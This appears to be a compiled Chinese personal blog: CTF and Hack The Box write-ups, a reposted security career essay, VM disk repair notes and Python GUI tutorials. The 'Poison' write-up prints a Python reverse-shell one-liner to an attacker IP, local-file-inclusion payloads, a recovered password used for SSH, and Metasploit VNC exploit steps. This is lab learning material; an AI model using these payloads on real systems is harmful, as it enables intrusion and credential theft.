题目地址 如题目所提示，是PHP文件包含漏洞。 访问给出的题目地址，网页提示“网站正在建设中”

扫描目录

和所有web漏洞一样，先dirbuster扫描一下

test.php报错

require_once()语句在脚本执行期间包含并运行指定文件 /home/level/14_live_fi/www/test.php不是一个目录，然后报错了。

info1:网站所在目录路径： /home/level/14_live_fi/www/

猜解参数

猜测应该是远程文件包含remote file include，于是访问rfi.php发现页面是空白。

因为看不到源码，所以只能爆破试试。 发现cmd是可能的命令参数。 /temp/rfi.php?cmd=http://127.0.0.1:80/test.php 查看源代码，多了<pre></pre>这个字符串。

访问/temp/rfi.php?cmd=http://vps的ip:888/whale.php 远程文件包含似乎没有成功。

所以搞不懂cmd这个参数到底怎么用。

重新扫描

找不到线索，于是重新扫描

info2: 整理下已知网站目录 http://lfi.warchall.net/protected/ http://lfi.warchall.net/temp/

http://lfi.warchall.net/protected/logs/20180905_critical_details.txt 可以分析出，log目录下，记录了来自各地的尝试文件包含的攻击记录。 而这个攻击记录，则表明，文件包含使用的是require_once()这个函数 而漏洞指明了index.php 的第11行。

线索

于是我返回了index.php

现在考虑一下，题目意思是什么，本地文件包含通常会泄露敏感信息。 然后下一步就是找flag了吧

找不到flag所在的路径啊！好气

writeup

writeup 看了一些wp，发现解题思路是这样的：solution.php因为是脚本文件，所以客户端是不能直接查看的。

要通过以下协议，将php编码一下再查看。?lang=php://filter/convert.base64-encode/resource=solution.php"

按照wp，这道题其实坏了，得不出flag的。有点坑。

参考：

图片转字符画

BadApple视频转字符动画

依赖

python3 + PIL模块

程序分析

该程序可以定义生成字符画的类型（html、txt）、画的尺寸

pil的image类

1
2
3
4

pic = Image.open('路径') #创建一个类实例
x,y = pic.size
out = pic.resize((x,y),Image.NEAREST) 
out.save("C:\Users\whale\Desktop\2.jpg")

上述代码，打开了一个图片a，获取了a的尺寸，并且以该尺寸另存为2.jpg。

如果在第一行加上 pic = Image.open('路径').convert('L') 那么保存的2.jpg就是灰度模式。一般都是RGB模式，学过绘画的都知道，三原色（red,green,blue）只要三种颜色，就可以调出任何其他颜色，黑色白色不算。 em…懒得写了，直接

源码

视频转png图片

png图片转txt

批量转换为txt

播放脚本：

1
2
3
4
5
6

#!/bin/bash
for i in $(seq 1 483)  
do
cat /root/Desktop/txt/$i.txt
sleep 0.1
done

效果

忧伤，水平还是这么菜

问题一，无法访问htb内网

？要怎样配置，才能让kali虚拟机访问htb内网。

相关（也许不相关）知识点：

• 端口转发，也可以叫静态端口映射你必须将你的服务端的内网ip的端口转发到外网才能访问，这就是端口转发。

• 动态端口映射（NAT，网络地址转换），两个主机，将a主机的1端口映射到b主机的1端口。于是访问b:1就等于访问a:1。

• 静态和动态端口映射的区别，当连接关闭后，内网和公网端口的映射就关闭了，这叫做动态端口映射。而静态端口映射，不管有无连接，端口映射关系都是固定的。

• shadowsocks代理：将一台服务器配置为ss代理服务器，然后客户端用口令等信息通过secure socket 5协议登陆，达到了通过代理访问网络的目的。

• 反向代理与正向代理：

反向代理，简而言之，就是一个服务端的负载均衡器

假如有很多很多客户端，由一个服务器处理不过来，那好，你说，那我多加几个服务器不就行了？又有一个问题，客户端来访问时候，到底访问哪个服务器？

呃，这就需要一个代理，将客户端的请求通过代理，发送到不同的服务器上去（有效的分流了请求，使单个服务器的压力不会太大）

一般用nginx作为反向代理的服务器。我的Linux里的nginx的路径是/etc/nginx，nginx.conf 是服务器的配置文件，用 -t 可以检查设置是否有误

实验一，kali and vps连通性

原因是，kali虚拟机是nat模式，通过物理机上网。kali的包通过物理机公网ip发出，vps连接kali，只能找到物理机。

实验二，端口转发

参考资料:内网端口转发 目的：绑定kali:2333和vps:22端口，因为vps能访问htb内网，kali不能，所以期望vps能代替我们将数据取回。

1
2

（kali虚拟机）#ssh -2 -D 2333 root@(vps的ip)
输入密码连接成功

将浏览器设置代理，监听127.0.0.1：2333，然后访问内网ip：80。

我还以为失败了，然后重新测试了一下。 配置proxychains监听127.0.0.1：2333，然后用nmap扫描，发现扫描内网主机存在，确认端口转发成功。

浏览器访问失败原因可能是：vps是通过vpn访问的htb内网，vpn将数据加密了，不允许数据包再重新转发到其他机器。

所以我们想用kali连htb内网，不能间接通过vps转发，只能用kali的openvpn直接连接。

实验三，windows连接openvpn

下载了openvpn，windows版本。 但是怎么都连不上。 查log，查ovpn文件。。。。最后发现

只可能是伟大的墙干的了。。。 终于找到问题的根源了，愁死我了==

有两个解决办法

• vultr的服务器重新装系统，系统换为kali的。好处是免费，墙外直接操作扫描速度等很快，坏处是复杂，虽然不难，但是要整也是很多事要做。
• 买htb的vip，每个月10英镑，折合90块左右。 然后切换到vip服务器，选择很多，肯定有没被墙的主机。

问题二，vmware鼠标失灵

方法一：先重装vmtools无效

方法二：vmware面板——帮助——软件更新——检查更新——获取更多信息——download now 更新vmware到15版本，成功

问题三，nat模式还是上不了网

虚拟网络编辑器——还原默认设置——确认 虚拟机重新启动

作者：赵彦
整理者：whale

编辑引言：

在网上看到赵彦前辈的这篇文章（2014年发布），但是通篇文字下来，一个小标题都没有，看得实在累得慌。

但内容对于新人来说，很有参考价值，所以斗胆编辑整理。

正文：

为了减少篇幅有些东西就略过不写了，可以参考我以前写的《信息安全从业参考》《信息安全的职业生涯》《CSO的生存艺术》等老文章，或者我记得在安言的论坛上有人对我写的话题展开和补充并重新成文，具体记不太清了，但应该也是可以参考的。

我个人没有能力去预言安全产业的发展，但职业毕竟是个跟产业相关性比较大的话题，所以也适当援引一些个人观点吧。

甲乙方说起

从甲乙方说起，乙方分为2B和2C两类，这里主要说2B的部分，因为2C中的大部分更适合归入互联网行业。

IDC的报告称2018年中国企业安全市场约200亿RMB，相对于互联网，游戏等其他领域而言显然是个很小的市场，所以安全公司不会像互联网领域的创业公司一样遍地开花，会受到整个市场容量的限制，对于乙方如果不是360，那就是启明绿盟天融信这类公司了（名字太多不一一列举，如果你所在公司营业额很高而未出现在此列请不要生气，这里并无意去关注具体的公司）。

有人会说以后乙方可能还会有BAT诸如阿里云这些，没错，但从做的事情而言，即便阿里云成了乙方，阿里云安全成了乙方安全，但实际上做的事情对于从业者而言还是甲方做的那些事情，因此在这里就不把他们归入乙方了。

对于乙方做的事情，从厂商角度看可能会有一系列的产品和服务的创新，但对于从业者而言其实跟以前差不太多，至少在可见的时期内还是以前文章里写的那些，还看到不到质的变化。

如果你一定要在乙方寻求点不同的体验，那就去所谓的互联网安全公司的非传统安全业务或者去传统安全公司的互联网业务线。

撇开乙方看甲方，应该是比较乐观的，这是一个跟企业安全市场盘子无关的领域，随着企业开始重视安全，甲方会有更多的安全职位，并且安全职位会多样化，这里应该是一个比较广阔的空间。

甲方乙方之外是学术研究领域，对那片土地不是很了解，本文就仅限于工业界吧。欢迎学术界和高校院墙之内的同学们补充。

（至于黑产和国家队，本文就不打算写了，毕竟大部分人不会走这条路，我只知道那也是一个很神奇又有点奇葩的世界，如果你有潜质，仅这一句话就能把你引向那里）

关于薪资

先退几步，如果你尚在考虑要不要进入这个行业，我可以提供几点参考。据我和朋友们观察，10多年以来在同一个公司同一个级别上的工程师，大多是安全比运维和开发的工资高，但CTO大多来自运维和开发，鲜有从安全晋升来的。

原因不难理解，安全在不少场合都不是必需品。好或者不好因人而异，事实上身边还是有很多安全技能很高的人表示如果再给一次选择的机会，可能不会选择安全，这其中包括你们耳熟能详的大牛们。有一个方法可以自测一下，如果你内心深处都没有偶尔想入侵一下，黑一下，一探安全究竟的时候，我建议你还是考虑其他安全以外的行业，你在这个行业能发力的可能性不大。

从业者的构成

从从业者的构成看，我认为可以分为黑客圈，安全圈和安全圈的外围。

黑客圈无论你喜欢叫他白帽子还是什么，总之就是以攻防技能为主线并以此出卖自己知识的人，安全圈跟黑客圈交集很大，也包括那些在安全行业的主要力量但却不是白帽子或黑帽子出身的人，这两者构成了安全行业的核心，即本质上安全行业是由理解网络攻防的人为核心构成的。

外围是什么呢，随着安全需求的多样化，安全会引入大量跟攻防不直接相关的人，比如做业务安全数据分析，运维hadoop集群或做BI的开发，或者做安全产品开发，这些人本质上不是跟安全行业强绑定的，例如有的人做安全产品的UI开发，换做去其他行业也一样做UI，做业务安全数据分析的去非安全的业务部门一样做数据分析，不是严格意义上安全行业的人。

只有以攻防为主线，和以安全咨询体系为主线的人才是跟安全行业绑定的，这些人需要考虑终生投产比和基因决定理论的影响，其他的外围看官们理论上跨行业更容易些。

在当前时间点看，安全圈是一个很小的圈子，不是远小于，是远远小于运维和开发圈，江湖味道更浓，有时候也颇具文人相轻的味道，不过好的一面是互联网公司之间安全团队的交流越来越平，除了直接敌对公司外，大部分人都朝着更加开放的互联网沟通和分享文化迈进。

说了这么多，如果你想进入安全行业，并且成为中流砥柱，那么知识结构和背景技能应该和攻防技术强相关，这条线不保证你容易成为高管，但从统计学角度能保证你不偏离行业的核心。

安全管理趋势

插几句谈一下安全管理的趋势，因为这个会影响从业者的价值观和学习方向。我个人认为的几个趋势：

1.企业安全管理最终都会向互联网公司学习–未来大多数公司都会复制自己业务到互联网，也就是大多数企业都会拥有互联网的属性。

从现在看，互联网公司的安全管理方法论是领先传统公司整整一个时代的，完全不在一个量级上。你还在做传统的安全吗？夸张一点说你就快不属于这个行业了

2.向云迁移–云是一种趋势，虽然我不认为短期内马上会有非常多的公司将自己的业务迁移到公有云上，或者从头打造私有云。

但是云计算折射出的IT管理方式，技术架构却会越来越成为安全管理的风向标，例如分布式IDC管理，虚拟化，SDN，海量运维生态，业务伸缩，大数据，高度自动化，敏捷发布……等很多带着时代标签的东西，安全管理体系的设计和产品化落地需要越来越多的围绕这些特性标签展开工作，如果你没有这方面的经验，也会逐渐out

3.倾向于以技术和产品（工具自动化）解决问题，而不再是以前宣扬的七分管理三分技术。看近些年的IT技术发展，本质上由Google、Facebook为代表的这些互联网公司带动，除了技术架构，像运维管理、研发生命周期管理、安全管理都在成为其他公司的教科书，安全的最高境界是让你身处于保护之中而不感觉那些繁琐措施和流程的存在，以技术、自动化、机器学习、人工智能为导向解决问题的价值观已超越流程制度的落后方式，也是过去那些理论标准越来越显得发虚的原因。

从这些趋势看，如果你是体系架构型，技术复合型（俗称全栈工程师），特定技术方向专攻型以后会受市场青睐，而“务虚型“的市场价值可能不太乐观。

随着2000年后安氏把基于资产威胁脆弱性风险评估方法论带入中国，精通各类安全标准的顾问身价一度比会安全技术的工程师高，但现在这些东西包括IT治理的理论已经远不如以前风光，你说你会ISO27001，随便找个聪明点的刚毕业的本科生，做一年也就会了。但如果你说”我有10万台服务器的安全管理经验“，对方可能会表示”小伙子，来我们这上班吧！“。

让会攻防的人学习ISO27001、20000之类的东西，跟让务虚型学习技术，前者的成功率会比较高，而后者的成功率会很低，这就是可替代性。

很多同学看到这些也许会觉得哀怨，甚至咨询圈的老人会列举一大堆”价值“和”空间“，是的我相信Accenture、Thoughtworks他们有很多我没提到的前景，我说这些并非因为我呆过360，出身绿盟，我也不是唯技术论者。 就像浪潮之巅所说的，这些都是时代的趋势，不是以个人意志为转移的，哪怕是公司想拒绝他都如同螳臂挡车。

为什么在互联网公司技术专家的报酬可以比管理人员高，取决于你解决问题所对应的价值层次，实际上也是时代演进的产物，也许现在更缺能解决实际问题的人。从就业的角度讲，这种趋势为技术从业者提供了更广阔的前景和空间。

对于乙方，比较有价值的地方是研究部门、安全服务、攻防强相关产品研发。对于甲方，除了大互联网（门户、搜索、广告、电商、网游、社交、支付、移动APP……）、金融、电信行业之外，其他就目前来讲可能不是甲方安全从业的好的选择，毕竟形式上重视安全和本质上重视安全还是两回事。

现实生活中的人员分布也可以佐证这一点，国内比较懂安全的人绝大部分都在互联网公司，第一梯队3BAT、第二梯队BAT之外的知名互联网公司（有些兄弟单拉出来绝不比BAT的差，这里主要是笼统的比较），第三梯队可能在金融和电信业有一些，再剩下来可能没有太懂安全的人了，因为懂安全的早就被上述挖光了……（当然，如果看官您恰巧是某个大牛，又恰好很例外不在上述行业中请勿生气，我会尽可能在该文的下一修订版本中注明”xxx是个例外，目前在yyy就职”）。

甲方安全建设的多样性也使得分工越来越细：网络与基础架构安全，业务与应用安全，风控……，例如SRC运营就是一个相当垂直的细分职能，尽管在互联网公司做安全你可能会有优越感，但如果长时间做很细的一块儿也可能导致没有成为领域专家却“偏科”的很厉害。T字形人才通常比较受欢迎，最好是甲方乙方都呆过，那样所有的套路你都会了，无死角。

价值一方面跟人才市场的供求关系有关，一方面也跟学习成本高低、获取技能的难易度有关，例如你会一种web开发语言，javascript，http协议，常用的SQL DML语句就能开始玩web安全了，但如果你想玩溢出，相比之下还是需要花更多的时间学习更多东西才能越过这个门槛，而读懂ISO27001则容易的多（这里无意于表达web和二进制谁更牛叉谁更值钱这样的无聊问题，只是举个抽象的例子），如果你觉得因为钱多而把自己的目标设定为要走袁哥的路，而忽视了自己的兴趣，fail的可能性比较大。另外，技巧永远不能代替技术，过分迷恋于技巧对长足的发展没有好处。

历史从业者的技能

第一代安全从业者的技能基本以OS和网络安全为主，1.5到第二代以广义的web service等应用安全为主，如果一定要说第三代，移动安全可能还算是当下比较热门，关注者比较多。

相对前沿的领域，而从VC的角度看移动互联网可能都不再是热点，早已开始布局更下一代的东西了，也许是类似于人工智能这样的领域。

PC端和web安全虽然研究者众多，议题众多，方法论很多，大多数行业内的从业者每天围绕这些工作，但这些应该即将归入红海，不再属于前沿的、时代浪潮之上的东西，反过来说一个蓝筹但不再新兴的市场，其对安全的需求还是有一个很高的保有量，所以有很多事情可以长期做但也许之后就不在是什么有新鲜感的东西了。

第一代的人起步的时候，那时候IT基础设置和应用复杂度都远不如现在，所以那时候都是把安全建设放在网络和系统层面的，而后来随着IT在社会生活中实用化的程度越来越高，业务越来越多的依赖于IT，I的多样性和T的复杂度成倍提升，使得安全的需求也越来越广，单个从业者的技能不太可能通吃全部，大一点的机构开始把业务安全独立出来，分工越来越细，人研究的内容则越来越专，安全团队中开始加入开发和运维，甚至还涉及到硬件领域，也许以后的安全团队就是一个什么人都有的兵器库。

对个人来说一方面你到底需要多前沿的铺垫才能不out，另一方面则要考虑将自身定位收缩于哪些点才可能挖到最深，视野一定是尽可能的宽泛，是一个“放”字，但落到实践一定是个“收”字，以如今的技术复杂度你不可能样样都精通，只能挑几个。

从业者的前景

对于从业者的前景，其实在过去相当长的时间里，由于乙方公司的净利润很低以及甲方安全不是产生收入的部门，所以从业者的前景一度比较暗淡，直到后来有了360这样的公司，有了BAT的崛起，才使得技术从业者的待遇得到了极大的改善。

斯诺登曝光之后，国家层面开始重视信息安全，以华为这样的企业建立安全能力中心为代表，今年安全人才需求开始井喷，供求比大幅失衡，国内资深从业者的工资已经赶超了美国的工程师，在当下看是一片利好，但有时候也说不清这到底是价值回归还是有点泡沫成分，没人能说得准，但短期内一定是人才供不应求，但是不是长期供不应求也很难说。

因为现在越来越多的高校也开始培养安全方向的人，供给量会变大，安全会从小众变成大众学科，当然，无论什么时候这个行业的精英一定是跟兴趣和天赋挂钩的，有时候确实需要一点“歪门邪道”的天赋。

关于创业，如果你原先是做安全产品研发，能带一支完整的团队出来，做的产品属于下一代类型或者干脆就是市场空白，不妨尝试一下，其他的类型我认为创业的成功率应该比较低。

最后，如果你有条件的话，多接触技术大牛和视野型的资深从业者，适当关注一下安全以外的新技术趋势。

全文完

通篇下来可能会有聪明的同学提问说的这些是不是可以概括为最优解应该是去互联网公司做安全？（看情况）其实不然，甲方乙方，身处不同的阶段有不同的需求，没有哪里一定最好之说，哪怕是3BAT对有些人来说也是瓶颈之地，所以还是看具体场景。

1. 端口扫描

ip: 10.10.10.84

1
2
3
4
5
6
7

22/tcp   open  ssh
80/tcp   open  http
5802/tcp open  vnc-http-2
5902/tcp open  vnc-2
5903/tcp open  vnc-3
6002/tcp open  X11:2
6003/tcp open  X11:3

嗯，确认是linux系统

2. web探测

一看到浏览器上的URL：file=xxx，就富有职业精神的输入../../../../../etc/passwd

Info1——机器上普通用户名称: hast::845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin nobody::65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin _tss::601:601:TrouSerS user:/var/empty:/usr/sbin/nologin messagebus::556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin avahi::558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin charix::1001:1001:charix:/home/charix:/bin/csh

运行：http://10.10.10.84/browse.php?file=php://filter/convert.base64-encode/resource=config.php

Info2——文件路径： Warning: include(php://filter/convert.base64-encode/resource=config.php): failed to open stream: operation failed in /usr/local/www/apache24/data/browse.php on line 2 Warning: include(): Failed opening ‘php://filter/convert.base64-encode/resource=config.php’ for inclusion (include_path=’.:/usr/local/www/apache24/data’) in /usr/local/www/apache24/data/browse.php on line 2

于是用php协议，访问browse.php，用hackbar解码一下。 本来想用dirbuster扫描下存在的文件，再用文件包括去查看敏感文件。。。 但是，这个实验中，主页面上有一个listfiles.php，访问以后，直接指出了一个pwdbackup.txt。

上面说这个密码很安全，它被加密了13次。真的还能出什么问题。 然后我一看，我去，base64编码还好意思说安全，加密13次又有什么意义吗？ 我还是太菜，手动把密文的\n去掉，然后再解码，很多次解码后，密码为：Charix!2#4%6&8(0

方法二： sed -i ‘s/\n//g’ pwdbackup.txt

Info3——口令 Charix!2#4%6&8(0

• Trying: ssh charix@10.10.10.84

charix/Charix!2#4%6&8(0 ssh登陆成功

3.提权

/home/charix目录下有三个文件，一个flag；一个secret，是空文件；还有一个secret.zip。 那么需要解压一下，tar -zxvf secret.zip 提示x secretEnter passphrase: 那么需要输入密码，然后尝试错误密码，会反复提示Enter passphrase。 通过Info3口令，成功解压。 解压后是secret文件，类型为：secret: Non-ISO extended-ASCII text, with no line terminators

用cat secret，显示为乱码。

• sudo、gcc———–>command not found
• su ——> Sorry
• uname -a查看内核版本，应该不是内核漏洞提权。

  1	FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64

• nc -l 999 ——-> nc: Permission denied

• Trying（SUID提权，参考）。 find / -user root -perm -4000 -exec ls -ldb {} \; 执行结果中，没有namp、vim、find等等可以提权的程序。

有意思的是，在连接过程中，ssh命令面板突然不灵了，无法输入任何命令。 重新连进去以后，我的readme.txt多了一行。。。看来遇到同道中人了。

• Trying：测试nc，用服务端连接kali。成功连接。

不是吧。。又连不上了，第一次遇到被人挤下线。

查看一下进程这些都是远程连进来的。。。

• Trying：太卡了，弹一个python shell。 本地：nc -lvp 1234 服务器：python ‐c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.198",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","‐i"]);'

• Trying : python -m SimpleHTTPServer 888

  1 2 3 4 5

  Traceback (most recent call last): File "/usr/local/lib/python2.7/runpy.py", line 174, in _run_module_as_main "__main__", fname, loader, pkg_name) 。。。此处省略几十行 socket.error: [Errno 13] Permission denied

• Trying：

• Trying: 尝试vnc远程命令执行

1
2
3

use exploit/multi/vnc/vnc_keyboard_exec
set RHOST
set PASSWORD

试了好多密码，包括里面secret文件。失败

2018.9.28.总结

writeup参考

SSH原理与运用（二）：远程操作与端口转发

通过绑定本地和远程的端口，就可以用vncviewer命令，使用密钥，开启vnc窗口 vncviewer -passwd secret 127.0.0.1:5901

死机之后

于是进入单用户模式 在如图所示的行，末尾加上init=/bin/bash F10，保存并重启

检查磁盘

Alt+F2，快捷键进入tty2 发现是操作系统没有磁盘空间了

扩展磁盘空间

发现要扩展磁盘，需要先删除所有快照

• 编辑虚拟机设置——硬盘——扩展 确认后，开机，等到虚拟机又卡住了，按alt+F2

可以看到sda已经从20GB变为40GB

可以看到/dev/sda1分区为100%利用率，所以我们要扩展的就是这个分区

…最近好多事，只有晚上才有时间整理一下，头昏脑涨之下，扩容失败了，grub找不到引导文件在哪个分区了 == 反正我找了好久，三个分区都是filesystem is unknown

1
2
3
4

set root=(hd0,6)  #选择哪块分区做引导
set prefix=(hd0,6)/boot/grub  #选择该分区的grub路径
insmod normal #保存设置
normal #确认

…算了，下回要学一学磁盘管理、灾备等知识。 先把vmdk磁盘备份一下，重新安装一个kali系统，然后把磁盘文件装进去。

提取vmdk中的数据（失败）

用软件poweriso 提取kali vmdk文件失败 数据错误：

正确做法

第一步：先清理文件，使得正常开机

在linux虚拟机死机后，先进入命令行模式，删除掉100%的根目录下的某些无用的文件（至少留出100mb）

然后就可以正常开机了。

第二步：关机虚拟机设置里硬盘扩容

可以看到根目录空间还是很紧张。 关机——备份虚拟机文件目录——编辑虚拟机设置——硬盘——输入硬盘容量——扩展——开机

第三步：开机添加新分区格式化

使得扩容之后的分区可以使用。 这里我添加的/dev/sda4分区。（详情可参考给出的链接） 使用下面的命令:

1
2
3
4

fdisk -l
fdisk /dev/sda
n  扩展磁盘
一路回车，创建就一个新的分区

将新分区转换为LVM格式 重启，并且格式化该分区

第四步：用LVM工具创建逻辑卷

省略，具体看总结里给出的参考资料

第五步：拷贝/usr资料

第三步，我们有了/etc/sda4 第四步，得到了/dev/mapper/debian-lv

mount /dev/mapper/debian-lv /media 该命令将分区挂载到根目录media目录下。

用df -h 可以查看挂载成功

cp -r -p /usr/* /media 等待比较长的时间，拷贝成功

第六步：修改/etc/fstab，使得开机自动挂载/dev/mapper/debian-lv分区

添加一行图中所示

重启即可

如果还是不行，那就狠心删掉/usr 因为根目录100%，可以使用的空间为0的话，是没办法正常开机的

不过删掉之前，一定要重启看看，

第一，/etc/fstab是否成功自动挂载debian-lv分区，

第二，/dev/mapper/debian-lv分区的内容是否成功备份了/usr！

可能会遇到的问题：

pvcreate not found or ignored by filtering 解决方案：pvscan -vvv

于是我们要修改配置文件，添加全局过滤器global_filter vi /etc/lvm/lvm.conf

pvcreate /dev/sda4 成功了

pv的意思是，physical volume物理卷

总结

• 为什么我在扩展磁盘的时候不知道备份一下虚拟机呢？反 省。。

• fdisk -l 查看有哪些磁盘 df -h 查看分区、容量大小、使用率等

• 什么是LVM？ 参考，简单的说就是磁盘管理工具

• 开机自动挂载/etc/fstab使用

写一个有图形界面的，汇率转换程序。 要求：

1. 使用类
2. 至少三个国家自由计算兑换后的货币数额。

定义了两个类，人民币转三种货币、美元转三种货币。

画一个图形界面

定义点击“Convert”之后执行的函数

源码Calculate_money.py

convert.py

ascii解码

http://www.wechall.net/challenge/training/encodings/ascii/index.php

url解码

http://www.wechall.net/challenge/training/encodings/url/index.php

Limited Access

说穿了就很简单，学一下curl post用法 http://www.wechall.net/challenge/wannabe7331/limited_access/index.php?show=htaccess

1

curl -o index.html -d "user=htpasswd" --cookie "WC=10813202-36365-7vglY8H4noZkwvLg" http://www.wechall.net/challenge/wannabe7331/limited_access/protected/protected.php

图形识别

http://www.wechall.net/challenge/can_you_readme/index.php 图片地址 python包，pytesseract 本来以为pip install pytesseract，就可以了 但是，脚本报了一个错，说not found

还需要下载

1
2
3

sudo apt update
sudo apt install tesseract-ocr
sudo apt install libtesseract-dev

编写脚本，识别成功以后，添加自动获取模块。

源码

题目地址： http://www.wechall.net/challenge/warchall/ssssh/index.php

Z is sleeping, if you hurry you can steal his SSH key and log in as level8 题目要求：窃取Z的ssh密钥，以用户level8登陆

查看backups，其中有authorized_keys.backup

1

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtyppECq53bP3yUbQToXsxIhuYK5PyXLvTCj+Ob02/kcM3ZUEXNpsX1177Gl92kq4+tbt9pRm3UY3C8/7pEmkSWcbiLgIx96aqIoFvHEOdmz+9YaimPmzqaHTDW+g8QV+khFGDp22SOaUpKaUTpmLKniavIEVP4ouXPLqwapg/xEU36xF18a6bG4/iYV/Nxmf0bv7K6nkgRsYC55lRPHMVJnI1Gy7eHHk/PiHYR5pkOIb9GSTtqcJTRs/EJgVhBMygHYTrVT8+HLW0PqYK3Dw/Z6az3+qOaaAYqJk7sxBAZC4/YKhLVL6LjagRpff6rpXFUwv1eHidy2iLBRNcY/2Hw== 

solution.txt查看，发现权限不够

第一步,尝试登陆

前面信息搜集完毕，知道我们要做的事是，获得level8的ssh密钥，登陆后查看solution.txt

查看level8登陆，端口正确 尝试用authorized_keys.backup登陆，提示权限问题 更改权限之后，提示格式错误

好吧，生成一个公钥和密钥，观察一下格式。

• 公钥：id_rsa.pub

  1

  ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCx8c7MJcW5+5AaCSiEj3t3H7Rwlqe5lDlnW0bjbalTFd/xYwOVXUJfV/WN1UR08Bxc7arQpnA9sW7yTtbFv0yJl/yjQUMTR1ZXED2Ad8SO/7a2C3qbQsRLhsEIwKBgl4TGolr7Av/K+eChVEQBzzkGueLMnkyHS6o+4R5NfFX5TyMWl4XEx/4VQTAjjmBQMG+cWp5rzhtcwcsXQb+01hjQa15MIZyaTGc/++JRMDQZShvy0HOg/lEuXacyuny59ipQ/+YnRAaxQ5VAZJqHIDII82Ip3UWPPV0hEzBJ+zatANXLm5GUZpLxC00+HKSA2XykyrD/GIvc2hsKGVtOPAKx root@whale3070

  私钥：

1
2
3
4
5

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAsfHOzCXFufuQGgkohI97dx+0cJanuZQ5Z1tG422pUxXf8WMD
lV1CX1f1jdVEdPAcXO2q0KZwPbFu8k7Wxb9MiZf8o0FDE0dWVxA9gHfEjv+2tgt6
此处省略几十行。。。
-----END RSA PRIVATE KEY-----

authorized_keys.backup 给的是公钥，不是私钥，无法直接登陆。。。

转到level8的家目录，cat .ssh，还是权限不够。

第二步,寻找漏洞信息

根据题目提示，Z is sleeping, if you hurry you can steal his SSH key and log in as level8

1. Z是谁？搜索了一圈，发现没有这个用户，可能是代称。
2. 在/home目录下，搜索关键字，id_rsa、.ssh、rsa 基本都是权限不够，不过发现了一个用户ricter！ 根据自己的家目录/home/user/whale3070判断，该用户也是在wechall上练习的人。

根据ricter留下的线索，认为是 openssl Predictable PRNG Brute Force SSH，一个可预测的ssh爆破漏洞

在rsa目录下有2048文件夹，里面存放着一些爆破用的文件，本来想拷出来，但权限不够。

info: warchall.net 176.58.89.195

第三步,下载exp,爆破

用脚本爆破ssh尝试登陆

继续上一篇。 我前些日子在某公司实习时候，负责writeup等文档的处理，需要批量给收到的文档打水印，因此写了一个python脚本。 现在把该脚本从命令行执行，添加图形化界面。

该程序的功能有：

1. 给png图片批量添加水印，可以选择两种不同的水印。
2. 给gif图批量添加水印。
3. 提取word文档中的所有图片，添加水印。

   优化方案：

   • 优化前：该程序通过文件后缀，png、gif、docx决定不同的执行方案。但是每一次都需要选择打哪一种水印（i、e）
   • 优化后：现在用pythonGUI的单选按钮，默认水印i。 再用输入框，接受图片所在路径

构建图形界面

按照上一篇学到的知识，先画出图形化界面。 此时点击start，并没有任何作用，后面再加点击后的行为。

添加点击后的效果

运行前

运行后：

替换点击后的效果

上一步确认了点击是有效果的，然后定义几个函数，替换点击的效果。

问题：此时遇到了问题。因为我当初写代码时候很随意，现在代码乱七八糟的。该程序总共有三个py文件，其中一个是主文件，两个自定义的模块文件png、unzip。

错误示范： 该函数获取两个路径，把path路径下的压缩文件解压缩，然后保存到savepath路径下。

因为调用了zipfile模块，所以不走心地前面加了一个my （┬_┬），而且因为懒得打字，还丢掉了file…

1
2
3
4
5

def myzip(path,savepath):
    f=zipfile.ZipFile(path,'r')

    for file in f.namelist():
        f.extract(file,savepath)

正确示范： def extractDocx(path,savepath):

• 名称应该有意义，它是做什么的，怎么用 废话没有意义。Variable一词永远不应当出现在变量名中。Table一词永远不应当出现在表名中。 话说我经常用var作为变量名～>_<～
• 使用可搜索的变量名

整理前（213行），居然还找出了两个定义了却没有使用到的函数╭（′▽‵）╭

梳理后（174行），将变量名整理了，并且只用调用judgment函数，即可运行程序。 这样方面了后面，再添加GUI的代码。

运行前

运行后

添加图形化界面程序初步完成了，写程序也是蛮累，吃饭~ 源代码

参考资料：

《python GUI Programming Cookbook》 《Expert Python Programming》python高级编程 《代码整洁之道》

学习时间2018-0901——20181231

学习目标：

• 初级目标: 熟悉GUI的模块属性的调用。 习惯于全英文技术书籍的阅读。
• 中级目标： 熟练掌握python高级语法。
• 高级目标 通过案例联系数据结构知识进行学习。 通过案例学习《代码整洁之道》，养成良好编码习惯 自定义项目练习。

python是动态类型语言，它可以从变量定义推断出类型。 主要使用tkinter模块，使用了titile属性——标题 Lable属性——设置标签内容

定义了一个函数，设置了点击后的行为

GUI是事件驱动的，点击就创建了一个事件。

按键输入的属性：

添加下拉选择框，坐标（1，1）：

定义点击后的显示文本

添加选择（是/否）按钮

添加单选按钮

总结：

python图形化编程，一如python的风格，拿来即用地简单。通过使用tk库的不同属性，定义框框大小、按钮button的类型，字符串所在的位置。

一个有图形界面的程序就完成了。

• mark一下，免得遗忘。
  1. xx = tk.Tk() xx是tk库的一个实例，以下都用xx举例
  2. 程序首要标题
     xx.title('mytitle')
  3. 程序定义框框坐标 column是横坐标，从上到下，从0开始，递增+1。 row是纵坐标，从左边到右边，从0开始，递增+1。 ttk.Label(xx,text='new').grid(column=0,row=0)
  4. 点击后，程序响应行为： 首先定义一个行为函数，使得后面可以调用 定义了clickMe函数，点击new按钮，文字变为old。

     1 2 3

     def clickMe(): myaction.configure(text='old') myaction = ttk.Button(xx,text='new',command=clickMe)

  5. 字符输入框 先创建tk的字符串变量实例name。 再创建ttk的输入框实例。

     1 2 3 4

     name = tk.StringVar() nameEntered = ttk.Entry(win, width=12, textvariable=name) nameEntered.grid(column=0, row=1) nameEntered.focus()

  6. 选择框 先创建tk的字符串变量实例chVarEn。 再创建tk的选择框实例。

     1 2 3 4

